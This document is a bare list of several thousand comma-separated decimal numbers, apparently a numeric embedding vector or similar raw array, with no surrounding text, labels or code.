0.006071517709642649, 0.024533888325095177, 0.010262541472911835, -0.01145060546696186, -0.04597735032439232, 0.011559936217963696, 0.014832579530775547, -0.02357177436351776, -0.041924815624952316, 0.006694704759865999, -0.0334407240152359, -0.033265795558691025, -0.01861543394625187, 0.003354641143232584, -0.017799096181988716, 0.0024216827005147934, -0.010087612085044384, 0.0012627736432477832, 0.00326899834908545, -0.004708523862063885, 0.033149175345897675, 0.017347194254398346, -0.017070220783352852, 0.03373227268457413, -0.004081692546606064, 0.0019770697690546513, -0.011333986185491085, -0.024431845173239708, -0.03486931696534157, -0.007208560593426228, -0.018819518387317657, 0.005083893891423941, 0.03352819010615349, 0.007930145598948002, 0.011290253140032291, -0.025641776621341705, 0.016006065532565117, 0.01065613329410553, -0.010313563048839569, 0.02714325673878193, -0.008352892473340034, -0.01497106533497572, -0.024708818644285202, 0.013331099413335323, 0.025393959134817123, 0.014548318460583687, -0.02166212536394596, 0.004376886412501335, 0.009067188948392868, -0.013221768662333488, 0.010597823187708855, -0.02816367894411087, 0.012777155265212059, -0.021516351029276848, 0.038426220417022705, 0.02478170581161976, 0.03839706629514694, 0.006931588519364595, -0.00812694150954485, -0.007168472744524479, 0.003416595282033086, -0.011829620227217674, -0.026662198826670647, 0.005568595137447119, -0.013119726441800594, -0.01116634439677, -0.01940261758863926, -0.015204304829239845, 0.025977058336138725, 0.017026489600539207, 0.032012131065130234, -0.015641629695892334, -0.008258138783276081, 0.045510873198509216, -0.004635636694729328, 0.02893628552556038, 0.0064723980613052845, 0.011180922389030457, 0.006465109530836344, -0.029592271894216537, -0.01896529272198677, 0.007263226434588432, 0.007565708830952644, -0.005987697280943394, -0.027566002681851387, 0.0027697200421243906, -0.030117060989141464, 0.006082450971007347, 0.03207044303417206, -0.005502996500581503, -0.005218735430389643, 0.00667648296803236, 0.009511801414191723, 0.009562822990119457, 0.019096489995718002, 0.001311972620896995, 0.011516204103827477, 0.025408536195755005, -0.0028043414931744337, -0.007314247544854879, 0.01145060546696186, 0.013542473316192627, -0.001420392538420856, 0.02559804357588291, 0.020627126097679138, -0.011363140307366848, 0.009970991872251034, -0.0010158676886931062, -0.00032844868837855756, 0.0038192979991436005, -0.01115905586630106, -0.005601394455879927, -0.00572165846824646, -0.0019533815793693066, 0.016764095053076744, -0.018688321113586426, -0.002671322086825967, -0.007088296581059694, 0.018265575170516968, -0.002418038435280323, -0.004227467346936464, -0.007602152414619923, -0.0019224043935537338, 0.005790901370346546, -0.00011980861017946154, -0.002862651366740465, -0.013768424279987812, 0.026224875822663307, -0.012164901942014694, 0.0164871234446764, 0.004256622400134802, 0.034373681992292404, -0.00011297542368993163, 0.025496002286672592, -0.015175149776041508, -0.001081466325558722, -0.013957930728793144, 0.011924372985959053, -0.006917011458426714, 0.018323885276913643, 0.0008300049230456352, 0.014628495089709759, 0.022186914458870888, -0.008782927878201008, 0.005896587856113911, 0.010845640674233437, 0.0067639476619660854, -0.018877828493714333, 0.0187466312199831, 0.015904024243354797, -0.012609514407813549, -0.025845861062407494, 0.014985643327236176, -0.008812082931399345, 0.01940261758863926, 0.00038129204767756164, 0.0060532959178090096, 0.017901137471199036, 0.01317803654819727, -0.013629937544465065, 0.0021337775979191065, -0.0068222577683627605, -0.014431699179112911, -0.0007202182896435261, 0.01413286104798317, -0.0018804940627887845, 0.011968106031417847, -0.015335502102971077, 0.028178256005048752, -0.011771310120821, 0.0029683380853384733, 0.009548244997859001, -0.0016335881082341075, -0.02287205681204796, 0.02030642144382, 0.0005156781408004463, -0.006333912257105112, -0.02501494437456131, 0.01951923780143261, -0.02368839457631111, 0.003387440461665392, -0.018600856885313988, 0.011261098086833954, -0.009110921062529087, -0.011239232495427132, -0.009774195961654186, 0.022638816386461258, -0.004074404016137123, -0.008323737420141697, -0.013389409519731998, 0.009941836819052696, -0.0033254860900342464, -0.025496002286672592, -0.003965072799474001, -0.02513156458735466, -0.009504512883722782, -0.01351331826299429, 0.0009338693926110864, 0.011341274715960026, 0.010852929204702377, 0.007026342209428549, 0.0036188578233122826, -0.03061269409954548, -0.00524789048358798, -0.01082377415150404, 0.017871983349323273, -0.006683771498501301, 0.010022013448178768, 0.011647401377558708, -0.0018085178453475237, -0.008761061355471611, -0.0015033020172268152, 0.007755215745419264, -0.0042128898203372955, 0.0035514370538294315, 0.012922930531203747, -0.02816367894411087, -0.015393812209367752, 0.005364510230720043, -0.009001590311527252, -0.008833949454128742, -0.010882084257900715, 0.03860114887356758, -0.008352892473340034, 0.021953675895929337, -0.007660462521016598, -0.004876164719462395, -0.020000293850898743, 0.0033145530615001917, 0.010794619098305702, 0.009934548288583755, -0.0004719457065220922, -0.020612547174096107, -0.008389336057007313, 0.00875377282500267, 0.009591978043317795, -0.009351449087262154, -0.016428813338279724, 0.002264974871650338, -0.005477485712617636, 0.002505503362044692, -0.00715025095269084, -0.006873278878629208, -0.011137190274894238, -0.0042529781349003315, 0.010699865408241749, -0.0034512169659137726, -0.00004219495167490095, -0.0185133907943964, 0.019810786470770836, 0.005142203997820616, -0.005761746317148209, -0.027318185195326805, 0.003219799604266882, 0.00395778426900506, -0.03005875088274479, 0.002141066361218691, 0.0034512169659137726, 0.006162627134472132, 0.011589091271162033, 0.01571451686322689, 0.024286070838570595, -0.014234903268516064, 0.00045304055674932897, -0.00892141368240118, 0.02422776073217392, 0.0032762871123850346, 0.027959594503045082, 0.010575956664979458, -0.008607998490333557, 0.024752549827098846, -0.00862986408174038, 0.0048907422460615635, -0.007328825071454048, 0.005980408750474453, 0.0035350373946130276, 0.003899474162608385, 0.019111067056655884, -0.0039614285342395306, 0.015233459882438183, -0.01568536087870598, 0.0048907422460615635, -0.02223064750432968, -0.0008336492464877665, -0.0029574050568044186, -0.016530854627490044, -0.008287293836474419, -0.00013062782818451524, -0.002500036731362343, 0.005419175606220961, -0.005648770835250616, -0.010051168501377106, 0.0035514370538294315, -0.004369597882032394, 0.007237715646624565, 0.020029447972774506, 0.026428960263729095, 0.016545431688427925, -0.015408389270305634, 0.0007051852880977094, -0.013987085781991482, -0.0067712366580963135, 0.0035332152619957924, 0.0013028617249801755, 0.00008547183097107336, 0.000029667437047464773, 0.02501494437456131, 0.024592198431491852, 0.008535110391676426, 0.008965146727859974, -0.018134377896785736, 0.0010532224550843239, 0.020816631615161896, -0.004110847599804401, -0.012835465371608734, 0.04440298303961754, 0.015758249908685684, 0.012616803869605064, 0.012143035419285297, 0.0077187721617519855, -0.02367381751537323, -0.011938950978219509, -0.006902433931827545, -0.014387966133654118, 0.01446814276278019, -0.004373242147266865, 0.01290106400847435, 0.008535110391676426, -0.016078952699899673, -0.01626846008002758, -0.002695010509341955, 0.018892405554652214, -0.00017196864064317197, -0.02018980123102665, -0.0038192979991436005, -0.009672153741121292, -0.0013484163209795952, 0.0015379234682768583, -0.006355778314173222, -0.034373681992292404, -0.006742081604897976, 0.023513464257121086, 0.003376507433131337, 0.007930145598948002, 0.006789458449929953, -0.0036024581640958786, -0.005171358585357666, 0.007828103378415108, -0.037988897413015366, 0.002607545582577586, 0.003199755446985364, -0.0014349700650200248, 0.008352892473340034, 0.030204525217413902, 0.017551278695464134, -0.02781382016837597, 0.007864546962082386, 0.0074090007692575455, -0.01053951308131218, 0.014854446053504944, -0.017201418057084084, -0.002755142515525222, 0.011472471989691257, 0.001336572109721601, -0.015889447182416916, 0.021472617983818054, -0.010415605269372463, -0.0062610250897705555, -0.0164871234446764, -0.0271286778151989, 0.003520459868013859, 0.001022245385684073, -0.012675113044679165, 0.024548465386033058, 0.01435152254998684, -0.01143602840602398, 0.0037901431787759066, -0.01240542996674776, -0.00002469913670211099, 0.012675113044679165, 0.0007580286473967135, -0.023294802755117416, -0.009715885855257511, -0.0006947077345103025, 0.019723322242498398, 0.0075001101940870285, 0.006665549706667662, -0.001089666155166924, -0.020831210538744926, -0.0036862785927951336, 0.005346288438886404, 0.021151913329958916, -0.005619616247713566, 0.01480342447757721, -0.00460283737629652, -0.0006874189712107182, 0.022143183276057243, 0.003589702770113945, 0.022959521040320396, -0.009854372590780258, -0.008979723788797855, 0.00539002101868391, 0.023950789123773575, 0.005914810113608837, 0.014708670787513256, 0.01693902350962162, 0.0013374831760302186, 0.0019989360589534044, 0.031895510852336884, 0.00541553134098649, -0.011596380732953548, -0.014162016101181507, -0.018425926566123962, -0.002040846273303032, -0.016866136342287064, 0.01973789930343628, 0.016180995851755142, 0.01794487051665783, 0.017653319984674454, -0.0045554605312645435, 0.0006773969507776201, -0.0004298076964914799, -0.014745114371180534, 0.015525009483098984, 0.010736308991909027, -0.010772752575576305, 0.012500183656811714, 0.016632897779345512, 0.016778672114014626, -0.001148887095041573, -0.01419117022305727, 0.0066473279148340225, 0.013411276042461395, -0.011873352341353893, -0.002363372826948762, -0.005488418973982334, -0.0020645346958190203, -0.0015197016764432192, -0.013812156394124031, -0.016676628962159157, 0.003697211854159832, 0.011406873352825642, 0.003392907092347741, 0.010131344199180603, 0.007944723591208458, -0.006333912257105112, -0.02223064750432968, 0.0042128898203372955, 0.022405577823519707, -0.00230141868814826, -0.014198459684848785, 0.009329583495855331, 0.017551278695464134, 0.0018331173341721296, 0.005127626471221447, 0.012463740073144436, -0.011137190274894238, -0.0005279778852127492, 0.0014149260241538286, 0.013433141633868217, 0.0025619911029934883, 0.0022412866819649935, 0.03128325939178467, 0.004486217629164457, 0.009745040908455849, -0.021851632744073868, 0.008855815045535564, 0.006917011458426714, 0.01581655815243721, -0.011793175712227821, 0.02288663387298584, -0.015627052634954453, 0.006975321099162102, -0.002113733673468232, -0.027901284396648407, 0.0024781704414635897, -0.004416974727064371, -0.009766907431185246, -0.0029136724770069122, 0.0033254860900342464, -0.03288678079843521, -0.009074477478861809, -0.007777082268148661, 0.0025383026804775, 0.009402470663189888, -0.003305442165583372, 0.008527821861207485, 0.007689617574214935, -0.007441800087690353, 0.008032187819480896, 0.025510579347610474, -0.0004302632587496191, -0.010350006632506847, -0.014788847416639328, 0.019562968984246254, -0.0056997924111783504, 0.0034676166251301765, -0.004395108204334974, -0.011210077442228794, 0.013360254466533661, 0.0038010762073099613, -0.009242118336260319, -0.009263984858989716, -0.010145921260118484, 0.023061564192175865, -0.0038921853993088007, 0.021735012531280518, 0.0019497370813041925, -0.015962334349751472, 0.016734939068555832, -0.0015124129131436348, -0.009978280402719975, -0.012055570259690285, -0.005634193774312735, 0.010218809358775616, 0.018353039398789406, 0.009890816174447536, 0.011654689908027649, 0.017186840996146202, -0.011428738944232464, 0.0041217808611691, -0.018790364265441895, -0.018600856885313988, -0.012412718497216702, 0.013673670589923859, -0.002450837753713131, 0.0008131496724672616, -0.007784370798617601, -0.008214406669139862, 0.02918410301208496, -0.016676628962159157, -0.0013757491251453757, 0.004325865302234888, 0.013301944360136986, -0.012106591835618019, -0.003332774853333831, -0.002826207783073187, 0.001795762567780912, 0.007871835492551327, 0.02077290043234825, -0.011093457229435444, -0.011691133491694927, 0.004114491865038872, 0.005291623063385487, -0.017565855756402016, -0.01626846008002758, -0.009949125349521637, 0.00524424621835351, -0.009285850450396538, 0.00920567475259304, -0.0017729852115735412, 0.0026986547745764256, -0.008994300849735737, 0.015029375441372395, 0.013433141633868217, 0.005437397863715887, 0.006625461857765913, 0.0011370430001989007, 0.0068987892009317875, 0.0010359117295593023, -0.023921635001897812, -0.02881966531276703, 0.005903876852244139, 0.0024799928069114685, 0.017478391528129578, 0.01647254452109337, -0.004952696617692709, 0.03061269409954548, -0.0005006451392546296, -0.012485606595873833, 0.019009025767445564, 0.0020481350366026163, -0.01931515336036682, 0.001030445215292275, -0.010976837947964668, 0.01672036200761795, 0.007354335393756628, 0.007900990545749664, -0.018003180623054504, 0.005874721799045801, 0.016662051901221275, -0.009679442271590233, -0.013651804067194462, 0.01705564372241497, 0.00510211568325758, -0.009810639545321465, 0.005856500007212162, 0.0001708297641016543, -0.004048893228173256, -0.004005161114037037, 0.00309771322645247, -0.014796135947108269, 0.02679339610040188, -0.015043952502310276, 0.002489103702828288, 0.002587501658126712, -0.01537923514842987, -0.002412571804597974, -0.015437544323503971, -0.01593317836523056, -0.0026767884846776724, 0.0028371408116072416, 0.007190338801592588, -0.0005803656531497836, 0.011013281531631947, -0.011217365972697735, 0.00715389521792531, 0.002040846273303032, 0.020510505884885788, -0.004110847599804401, -0.004136357922106981, 0.009847083128988743, -0.005229668691754341, -0.00119170849211514, 0.012245077639818192, -0.0032106884755194187, 0.008571554906666279, -0.01817810907959938, 0.01828015223145485, 0.008935991674661636, -0.0012463739840313792, 0.01583113707602024, 0.025947902351617813, -0.02030642144382, -0.01061240117996931, -0.011727577075362206, 0.0022777302656322718, -0.009715885855257511, -0.013309233821928501, -0.00493811909109354, -0.024256916716694832, -0.017084799706935883, 0.023513464257121086, -0.0008828482241369784, -0.01334567740559578, -0.022930366918444633, 0.016006065532565117, -0.005302555859088898, 0.01638508029282093, 0.0026093677151948214, 0.039534106850624084, -0.013032261282205582, 0.021122759208083153, -0.017522122710943222, 0.000216270491364412, 0.007944723591208458, 0.0039104074239730835, 0.0020991561468690634, 0.005965831223875284, 0.0049745626747608185, -0.016428813338279724, 0.010648844763636589, -0.03186635673046112, -0.0017237862339243293, -0.01144331693649292, -0.004916253034025431, -0.002928250003606081, 0.0032234438695013523, 0.009387892670929432, -0.018440503627061844, 0.010954971425235271, 0.00958468858152628, 0.02320733852684498, 0.006392222363501787, -0.01290835253894329, 0.011523492634296417, -0.005922098644077778, 0.009118209592998028, -0.0024216827005147934, -0.01126838754862547, 0.02164754830300808, -0.008994300849735737, -0.015437544323503971, 0.0037901431787759066, 0.0149273332208395, -0.018032334744930267, -0.0061699156649410725, -0.009570111520588398, 0.015116840600967407, -0.00199164729565382, 0.0022212425246834755, 0.015495854429900646, 0.014985643327236176, 0.007937434129416943, -0.017186840996146202, -0.0008946924353949726, 0.002173865679651499, 0.012660535983741283, -0.008454934693872929, -0.008571554906666279, 0.007128384429961443, -0.0206562802195549, -0.012150323949754238, 0.013119726441800594, 0.001667298492975533, 0.008812082931399345, 0.0007730616489425302, -0.022638816386461258, -0.006720215547829866, -0.013032261282205582, 0.004843365401029587, 0.010298985056579113, -0.0006655527977272868, 0.010459337383508682, -0.013914198614656925, -0.016224728897213936, -0.011989971622824669, -0.0022230646573007107, -0.004384175408631563, 0.005539440084248781, -0.03163311630487442, -0.008906836621463299, -0.014344234019517899, 0.0044643511064350605, 0.011122612282633781, 0.015525009483098984, -0.01094039436429739, 0.009978280402719975, 0.0010532224550843239, -0.011049725115299225, -0.01715768687427044, -0.012879198417067528, 0.011304831132292747, -0.01616641879081726, 0.005820056423544884, -0.004300354514271021, 0.049767494201660156, -0.013214480131864548, 0.012594937346875668, -0.0076677510514855385, 0.008345603942871094, -0.0036680568009614944, 0.01194623950868845, -0.003145089838653803, -0.01239814143627882, 0.027434805408120155, -0.014701382257044315, -0.01116634439677, -0.007726061157882214, 0.0025783907622098923, 0.0183967724442482, 0.004526305478066206, -0.010867506265640259, -0.017813673242926598, 0.011355851776897907, 0.008221695199608803, 0.013425853103399277, 0.01693902350962162, -0.0005083893775008619, -0.004074404016137123, 0.00343299494124949, 0.0014641250018030405, 0.015204304829239845, 0.013593493960797787, -0.006669193971902132, 0.0029373608995229006, -0.00491260876879096, -0.012478317134082317, 0.022376421838998795, -0.012536627240478992, -0.015568741597235203, -0.008003032766282558, -0.013724691234529018, 0.008855815045535564, 0.003726366674527526, -0.01194623950868845, 0.024635929614305496, 0.012675113044679165, 0.0013502384535968304, -0.009489934891462326, -0.018032334744930267, 0.006140760611742735, -0.0005079338443465531, 0.0020882231183350086, 0.020583393052220345, 0.017084799706935883, -0.0014960132539272308, 0.023090718314051628, -0.014752402901649475, -0.016749517992138863, -0.009745040908455849, -0.017580432817339897, -0.0017192307859659195, -0.0005498440586961806, -0.02590417116880417, -0.013775712810456753, -0.011414161883294582, 0.013083282858133316, -0.0008536932873539627, -0.015889447182416916, 0.011377718299627304, -0.028790511190891266, 0.02223064750432968, 0.03361565247178078, -0.03638537600636482, 0.007594863884150982, 0.016399657353758812, -0.005696147680282593, -0.0026275895070284605, -0.013739269226789474, -0.0055758836679160595, 0.0022030207328498363, 0.02559804357588291, -0.001995291793718934, -0.011851485818624496, 0.011312119662761688, 0.0030394033528864384, -0.010969548486173153, -0.027289031073451042, 0.02029184252023697, 0.0029173169750720263, -0.007726061157882214, -0.02164754830300808, -0.000011716075277945492, 0.024286070838570595, 0.014941910281777382, -0.027799243107438087, 0.03553988039493561, -0.010685288347303867, 0.004263910930603743, -0.003148734336718917, 0.013608071953058243, -0.0075001101940870285, -0.0013329277280718088, 0.0029574050568044186, -0.011333986185491085, 0.006293824408203363, -0.019810786470770836, 0.005550372879952192, -0.03163311630487442, 0.018484236672520638, -0.016647474840283394, -0.005539440084248781, -0.01672036200761795, -0.023732127621769905, -0.00013279166887514293, -0.0008568821358494461, -0.006683771498501301, 0.017143109813332558, -0.011997261084616184, -0.007828103378415108, 0.012609514407813549, -0.010481203906238079, -0.017347194254398346, -0.006913366727530956, -0.0005384554388001561, 0.016108108684420586, -0.0017574966186657548, 0.009431625716388226, 0.003438461571931839, 0.006410444155335426, -0.002591145923361182, 0.020452195778489113, -0.005801834631711245, -0.0017948513850569725, 0.027070367708802223, -0.0008892258629202843, 0.014249480329453945, -0.008192540146410465, 0.025875015184283257, 0.011880640871822834, 0.0008573376690037549, -0.01222321204841137, -0.01692444644868374, -0.006716570816934109, -0.0018458726117387414, 0.014941910281777382, -0.007000831887125969, -0.008403913117945194, -0.005277045536786318, -0.02109360508620739, 0.02099156193435192, 0.007944723591208458, 0.012471028603613377, -0.00998556986451149, 0.00684412382543087, 0.023848745971918106, 0.006891500670462847, -0.00199164729565382, -0.01658916473388672, -0.009322294034063816, 0.005871077533811331, 0.031050018966197968, -0.020510505884885788, 0.01003659050911665, -0.001124287606216967, -0.003392907092347741, -0.015889447182416916, 0.023600930348038673, 0.02253677509725094, -0.009271273389458656, -0.029300721362233162, -0.012937507592141628, -0.015758249908685684, -0.008156096562743187, 0.016078952699899673, -0.01475969236344099, -0.03052522987127304, 0.02109360508620739, 0.023717548698186874, -0.006301112938672304, 0.0244755782186985, -0.007871835492551327, -0.02535022608935833, -0.028746778145432472, 0.013476874679327011, 0.014234903268516064, -0.018542546778917313, 0.005320777650922537, -0.00841849111020565, 0.00589294359087944, -0.007587574888020754, 0.016020644456148148, -0.0048980312421917915, 0.004916253034025431, 0.007988455705344677, 0.008644442074000835, 0.01037187222391367, 0.011457893997430801, 0.012886486947536469, 0.004282132722437382, 0.007521976251155138, -0.01896529272198677, -0.0008614375838078558, -0.002412571804597974, 0.026108255609869957, 0.029475651681423187, 0.012952085584402084, -0.0111080352216959, 0.0025091476272791624, 0.016326770186424255, -0.013294655829668045, 0.004497150424867868, 0.00508024962618947, 0.01986909657716751, 0.01928599737584591, 0.0032580653205513954, -0.004788700025528669, -0.005612327251583338, -0.008316448889672756, -0.007638595998287201, -0.016399657353758812, -0.0029865598771721125, -0.026545578613877296, 0.000484700984088704, 0.005142203997820616, 0.0011871530441567302, -0.017930293455719948, 0.01965043507516384, 0.0060022748075425625, 0.004070759285241365, 0.009854372590780258, -0.000402019388275221, -0.008010322228074074, -0.00030635471921414137, 0.016982756555080414, 0.004183734767138958, 0.01016049925237894, -0.002130133332684636, -0.011931662447750568, -0.01492004469037056, 0.010903949849307537, 0.016632897779345512, 0.004708523862063885, 0.011013281531631947, -0.02626860700547695, -0.007645884994417429, -0.002583857160061598, -0.012150323949754238, 0.006075161974877119, -0.017420081421732903, 0.000047974692279240116, -0.01016049925237894, -0.014008952304720879, 0.011669267900288105, 0.0036024581640958786, 0.0022886632941663265, -0.02332395873963833, 0.023877901956439018, 0.01919853314757347, -0.02018980123102665, 0.011399584822356701, 0.020947828888893127, -0.009402470663189888, 0.003764632623642683, -0.004041604697704315, 0.0046392809599637985, -0.00309771322645247, -0.0036571237724274397, -0.011100745759904385, 0.03142903372645378, 0.027901284396648407, 0.0000563168796361424, 0.010626978240907192, -0.015000220388174057, -0.006902433931827545, -0.0009297694778069854, -0.025175297632813454, 0.017230574041604996, 0.00862986408174038, 0.01401624083518982, -0.01070715393871069, 0.010860217735171318, -0.011224654503166676, -0.00033368749427609146, 0.007456377614289522, -0.0036534792743623257, -0.0007015409064479172, 0.006592662539333105, -0.018644588068127632, 0.01975247636437416, 0.01692444644868374, 0.015743670985102654, 0.023498887196183205, 0.007864546962082386, -0.0183967724442482, 0.00813423004001379, -0.004836076870560646, 0.013746557757258415, 0.016632897779345512, -0.011100745759904385, -0.003287220373749733, -0.012492895126342773, -0.015904024243354797, 0.000005341989435692085, 0.0023615506943315268, 0.014213036745786667, -0.0016536321491003036, 0.003181533655151725, 0.006279246881604195, -0.0003090880054514855, 0.009832506068050861, -0.04151664674282074, -0.014912755228579044, 0.012952085584402084, -0.01661832071840763, 0.020277265459299088, 0.001259129261597991, 0.024956634268164635, -0.004661147017031908, 0.0068222577683627605, 0.002110089408233762, 0.0030412254855036736, 0.005605038721114397, -0.003591525135561824, 0.010882084257900715, -0.02434438094496727, -0.01873205415904522, -0.008003032766282558, 0.00841849111020565, 0.012500183656811714, 0.01672036200761795, 0.010597823187708855, 0.005623260512948036, 0.005758102051913738, 0.0000033703290682751685, 0.01115905586630106, 0.002161110518500209, 0.003081313567236066, -0.00874648429453373, -0.032799314707517624, 0.007368912920355797, -0.012106591835618019, 0.0016654763603582978, -0.01928599737584591, -0.007427223026752472, 0.0015115018468350172, -0.015962334349751472, 0.0054847742430865765, 0.014628495089709759, -0.00812694150954485, -0.0006819524569436908, -0.004719457123428583, -0.0027186989318579435, 0.01704106666147709, 0.00846951175481081, -0.011341274715960026, -0.0052843340672552586, 0.005601394455879927, -0.009679442271590233, -0.020379308611154556, -0.0005821878439746797, 0.006610884331166744, -0.000969401968177408, -0.008979723788797855, -0.023396845906972885, -0.014745114371180534, -0.00606058444827795, -0.007212204858660698, -0.01918395608663559, 0.020627126097679138, -0.007070074789226055, -0.02625402994453907, 0.02110818214714527, -0.010357295162975788, 0.01739092543721199, -0.025656353682279587, -0.010298985056579113, -0.023834168910980225, 0.008957857266068459, -0.0023269292432814837, -0.0026804329827427864, 0.009745040908455849, -0.007019053678959608, 0.017143109813332558, 0.021501773968338966, 0.008382047526538372, 0.017230574041604996, 0.022478464990854263, 0.010167787782847881, -0.019009025767445564, 0.008258138783276081, 0.00887039303779602, 0.00975232943892479, -0.024081986397504807, -0.0038411642890423536, -0.01255849376320839, -0.02523360773921013, 0.015102262608706951, -0.013979797251522541, 0.0019606701098382473, -0.02669135481119156, 0.013258212246000767, -0.01861543394625187, 0.020116914063692093, 0.013046839274466038, 0.0066874162293970585, 0.010845640674233437, 0.009591978043317795, 0.01401624083518982, 0.034723542630672455, -0.0007284181192517281, 0.007558420300483704, -0.008505956269800663, -0.008564265444874763, -0.012259655632078648, -0.022128604352474213, -0.0010823773918673396, -0.012412718497216702, -0.009686730802059174, -0.012157613411545753, -0.027114100754261017, 0.004952696617692709, -0.007747927214950323, -0.0017921181861311197, 0.007084652315825224, 0.026997480541467667, 0.02881966531276703, -0.0092566953971982, -0.015248037874698639, 0.005171358585357666, 0.009169231168925762, 0.01386317703872919, -0.015175149776041508, 0.003128690179437399, 0.01228152122348547, -0.03734748810529709, 0.008316448889672756, 0.016778672114014626, -0.006257380358874798, -0.016297616064548492, 0.007277803495526314, -0.022186914458870888, -0.03107917308807373, -0.01396522019058466, 0.011581802740693092, 0.017799096181988716, -0.0008919591782614589, 0.0013666381128132343, 0.007944723591208458, -0.009351449087262154, -0.009905393235385418, -0.013199902139604092, 0.0007297847769223154, -0.01514599472284317, -0.011698422953486443, -0.0029865598771721125, 0.0013994374312460423, -0.01126838754862547, 0.00044848507968708873, -0.007019053678959608, -0.019023602828383446, 0.031166639178991318, -0.011457893997430801, 0.021020716056227684, -0.01542296726256609, 0.010554091073572636, 0.004752256441861391, -0.010714443400502205, 0.0004386908549349755, 0.002368839457631111, 0.0012891953811049461, 0.00908176600933075, -0.00043345207814127207, -0.018688321113586426, 0.006694704759865999, -0.004085336811840534, -0.005036517046391964, 0.00429306598380208, -0.019767053425312042, 0.015539586544036865, -0.0010787330102175474, 0.016355926170945168, -0.009635710157454014, 0.0004323132161516696, -0.004595548380166292, 0.01615183986723423, -0.03317832946777344, -0.0076750400476157665, -0.0006122539052739739, -0.0021538217552006245, -0.027668045833706856, -0.024723395705223083, -0.008228983730077744, -0.012077436782419682, -0.004992784932255745, -0.005062027834355831, 0.008214406669139862, -0.026443537324666977, -0.0012463739840313792, 0.013469585217535496, 0.007995744235813618, 0.024971213191747665, -0.017930293455719948, 0.02244930900633335, 0.0003894918772857636, -0.014424409717321396, -0.01083106268197298, -0.02727445401251316, 0.01161824632436037, -0.009008878841996193, 0.007193983066827059, 0.012973951175808907, -0.028790511190891266, -0.011202788911759853, 0.008659019134938717, 0.024956634268164635, -0.019941983744502068, -0.00115070934407413, -0.005681570153683424, -0.004438840784132481, 0.0058856550604105, 0.0016864314675331116, 0.022303534671664238, 0.020218955352902412, 0.01083106268197298, 0.011632824316620827, -0.005907521117478609, -0.015772826969623566, -0.01680782623589039, -0.006104317028075457, -0.0008318271138705313, 0.03434452787041664, -0.009147364646196365, 0.0022412866819649935, 0.01931515336036682, -0.025641776621341705, 0.002591145923361182, -0.007777082268148661, 0.00326535408385098, -0.0004519016947597265, 0.009963703341782093, 0.011764021590352058, 0.014198459684848785, 0.004621059168130159, 0.014613917097449303, 0.0073251803405582905, 0.004836076870560646, 0.01637050323188305, 0.014562896452844143, -0.010677999816834927, 0.015000220388174057, 0.0026203009765595198, -0.018221842125058174, -0.006876923143863678, 0.0073324693366885185, -0.014985643327236176, -0.007740638684481382, -0.018221842125058174, -0.020029447972774506, 0.013768424279987812, 0.03962157294154167, 0.012660535983741283, -0.0074490890838205814, 0.019796209409832954, -0.031254105269908905, -0.01049578096717596, 0.00358788063749671, 0.019606702029705048, 0.016078952699899673, 0.005543084349483252, -0.006435954477638006, -0.004467995837330818, 0.011836908757686615, 0.008761061355471611, -0.005736235994845629, -0.0019096489995718002, -0.014118283055722713, -0.00620271498337388, -0.006800391245633364, -0.01127567607909441, -0.00936602707952261, -0.017026489600539207, -0.0008637153077870607, 0.0038375200238078833, 0.00653435243293643, 0.009315005503594875, -0.002600256819278002, -0.008105074986815453, -0.004172801971435547, -0.014956488274037838, 0.0006505197379738092, -0.02144346386194229, -0.0007484621601179242, -0.01363722700625658, -0.01704106666147709, -0.02725987508893013, -0.013542473316192627, 0.003848453052341938, -0.00017117142851930112, 0.014898178167641163, -0.02018980123102665, 0.013170747086405754, -0.009096344001591206, 0.0040780482813715935, -0.013535183854401112, 0.011217365972697735, -0.0026367006357759237, -0.010503069497644901, -0.0024781704414635897, -0.01852796971797943, 0.004362308885902166, -0.01537923514842987, 0.0029537605587393045, -0.012784444727003574, -0.007616729941219091, -0.00732153607532382, 0.010401027277112007, 0.015583319589495659, 0.003216155106201768, -0.007740638684481382, -0.006964387837797403, 0.006774880923330784, -0.002520080655813217, 0.0021319554653018713, 0.011421450413763523, -0.008177963085472584, 0.009191096760332584, -0.010481203906238079, 0.007099229842424393, 0.031574808061122894, 0.00784268043935299, 0.014344234019517899, 0.014941910281777382, -0.007299670018255711, 0.0036881007254123688, -0.026195719838142395, 0.025845861062407494, 0.015845714136958122, -0.019052758812904358, -0.002687721746042371, 0.003033936722204089, -0.007507398724555969, 0.00477047823369503, -0.0012008193880319595, -0.004052537493407726, 0.008236272260546684, -0.001989825163036585, 0.01149433758109808, -0.0022248870227485895, -0.0024945701006799936, -0.00908176600933075, -0.0029191391076892614, -0.035510726273059845, 0.02323649264872074, 0.00460283737629652, -0.001283728750422597, 0.0017210530349984765, 0.00813423004001379, 0.0025273694191128016, -0.00155067874584347, -0.007401712238788605, -0.007580286357551813, 0.01896529272198677, 0.03705593943595886, -0.0013575272168964148, 0.008863103576004505, -0.02053966000676155, 0.006465109530836344, -0.010969548486173153, -0.001328372280113399, 0.011151767335832119, -0.009912681765854359, 0.0033655741717666388, -0.015452122315764427, -0.016793249174952507, -0.011297541670501232, 0.004223823081701994, -0.013673670589923859, -0.009766907431185246, 0.017886560410261154, -0.007492821663618088, -0.0024471934884786606, 0.015000220388174057, 0.0082435617223382, -0.012310676276683807, -0.002046312903985381, 0.014548318460583687, 0.003509526839479804, -0.003695389488711953, 0.010262541472911835, -0.010896661318838596, 0.0018987159710377455, 0.008221695199608803, 0.010772752575576305, 0.04915524274110794, 0.010007435455918312, 0.007638595998287201, -0.00038129204767756164, -0.0015424789162352681, -0.007040919736027718, 0.004657502751797438, -0.018017757683992386, -0.00653435243293643, -0.02355719730257988, -0.02746395952999592, 0.013768424279987812, 0.00667283870279789, -0.025175297632813454, -0.011377718299627304, -0.0005461997352540493, 0.014898178167641163, -0.0006409533089026809, -0.010109477676451206, -0.001616277382709086, 0.008607998490333557, -0.004537238739430904, 0.008484089747071266, 0.008892258629202843, 0.006162627134472132, 0.00954095646739006, 0.0012891953811049461, -0.010721731930971146, 0.028805088251829147, -0.03478185087442398, 0.011093457229435444, 0.012981240637600422, 0.009154653176665306, 0.002687721746042371, 0.016530854627490044, 0.006454176269471645, 0.0012245078105479479, 0.021691281348466873, -0.01693902350962162, -0.00879750493913889, 0.011793175712227821, 0.01593317836523056, -0.002434438094496727, 0.014038107357919216, -0.013593493960797787, -0.015554164536297321, -0.01256578229367733, -0.031020862981677055, 0.008214406669139862, 0.009045322425663471, -0.01459205150604248, 0.00044210744090378284, -0.011545359157025814, 0.003299975534901023, 0.006246447563171387, 0.0022595084737986326, 0.004493506159633398, -0.010882084257900715, 0.015350080095231533, 0.004070759285241365, 